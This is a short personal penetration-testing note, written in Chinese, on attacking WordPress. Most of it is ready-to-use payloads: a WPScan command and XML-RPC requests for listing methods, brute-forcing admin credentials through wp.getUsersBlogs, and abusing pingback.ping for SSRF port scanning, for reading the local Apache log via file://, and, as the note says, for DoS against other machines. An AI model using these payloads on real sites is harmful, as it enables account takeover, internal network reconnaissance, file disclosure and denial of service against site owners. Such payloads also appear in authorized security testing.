0x00 前言

个人笔记。

0x01 WPScan

Kali中自带:

1
kali@kali:~$ wpscan --proxy protocol://ip:port --url http://a.com/

0x02 xmlrpc.php

探测方法

1
2
3
4
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

暴破账号

1
2
3
4
5
6
7
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

SSRF

前提是WP版本 <= 3.5.1。如果高于该版本只能DNSLog验证,也能用于向其他机子发起DoS攻击。

1
2
3
4
5
6
7
8
9
10
11
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://127.0.0.1:80</string></value>
</param>
<param>
<value><string>http://localhost/wordpress/?p=1</string></value>
</param>
</params>
</methodCall>

如果目标IP和端口存在,则响应包中的<value><int>中的值大于0。

利用脚本:https://github.com/FireFart/WordpressPingbackPortScanner

除了端口扫描外,还能结合file://协议来读取本地文件:

1
2
3
4
5
6
7
8
9
10
11
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>file:///var/log/apache2/access_log</string></value>
</param>
<param>
<value><string>http://localhost/wordpress/?p=1</string></value>
</param>
</params>
</methodCall>